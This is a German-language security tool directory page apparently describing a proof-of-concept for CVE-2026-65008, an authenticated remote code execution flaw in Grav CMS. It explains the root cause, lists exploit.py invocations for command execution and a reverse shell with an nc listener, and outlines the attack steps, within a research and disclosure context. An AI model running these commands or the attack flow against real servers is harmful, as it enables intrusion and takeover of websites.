Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-65008 — CVE-2026-65008 | Kitploit
Tools/GitHubGitHub/zer0dayf/cve-2026-65008
SchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsPapers & ForschungLernen & Bildung
GitHubzer0dayf/cve-2026-65008

CVE-2026-65008

CVE-2026-65008

Repository anzeigen
11vor 1 MonatNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-65008 — Grav CMS < 2.0.7 Authentifizierte RCE

Proof-of-Concept für CVE-2026-65008: authentifizierte Remote-Codeausführung in Grav CMS über uneingeschränktes call_user_func_array() in Blueprint::dynamicData().

Ein Benutzer mit admin.pages (oder api.pages.write) kann bösartiges Formular-Frontmatter einschleusen. Das Payload wird dann als Webserver-Benutzer ausgeführt, wenn jeder Besucher (auch ohne Authentifizierung) die Seite lädt.

Nur autorisierte Tests. Verwenden Sie dies ausschließlich auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche schriftliche Genehmigung zum Testen haben.

Danksagungen

Tool herunterladen
Rolle
SchwachstellenmelderYuvalMil, MatiHub25, LeonKaya
HerstellerhinweisGHSA-fj2p-qj2f-74v5
Dieses RepositoryUnabhängiges Labor-PoC / Automatisierung

CVE: https://www.cve.org/CVERecord?id=CVE-2026-65008

Grundursache

Blueprint::dynamicData() übergibt ein angreiferkontrolliertes Class::method-Callable und Argumente ohne Allowlist an PHP call_user_func_array(). In Kombination mit Grav\Common\Utils::arrayFilterRecursive als Trampolin erreicht dies system() / passthru / usw.

Behoben in Grav 2.0.7+.

CVSS

9.8 KRITISCH — CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Voraussetzungen

  • Python 3.10+
  • requests

Installation:

root@kitploit:~
pip install -r requirements.txt

Verwendung

Befehlsausführung

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' -c "id"

Reverse Shell

Zuerst Listener starten:

root@kitploit:~
nc -lvnp 4444

Dann:

root@kitploit:~
python3 exploit.py -u http://TARGET -U admin -P 'password' --lhost YOUR_IP --lport 4444

Argumente

FlagBeschreibung
-u, --urlZiel-Basis-URL (erforderlich)
-U, --usernameAdmin / Benutzer mit Seitenbearbeitungsrechten (Standard: admin)
-P, --passwordPasswort (erforderlich)
-c, --commandAuszuführender Befehl (Standard: id)
--lhostReverse-Shell-LHOST
--lportReverse-Shell-LPORT (Standard: 4444)
--folderSeitenordnername (Standard: rcepoc)
--no-verifyTLS-Verifizierung deaktivieren

Ablauf

  1. Anmelden bei /admin (login-nonce extrahieren)
  2. admin_nonce aus dem Admin-Panel abrufen
  3. Eine Seite speichern, deren Frontmatter das data-opts@:-Gadget enthält
  4. Mit nicht authentifiziertem GET auslösen → RCE als www-data

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungs- und autorisierten Sicherheitsforschungszwecken. Der Autor ist nicht für Missbrauch verantwortlich. Holen Sie vor dem Testen von Drittsystemen immer eine schriftliche Genehmigung ein. Die ursprüngliche Schwachstelle wurde über den Herstellerhinweis offengelegt; dieses Repository demonstriert lediglich die Reproduktion im Labor.

Referenzen

  • https://github.com/getgrav/grav/security/advisories/GHSA-fj2p-qj2f-74v5
  • https://nvd.nist.gov/vuln/detail/CVE-2026-65008
  • https://www.cve.org/CVERecord?id=CVE-2026-65008

Lizenz

Nur für Forschungszwecke. Keine Gewährleistung.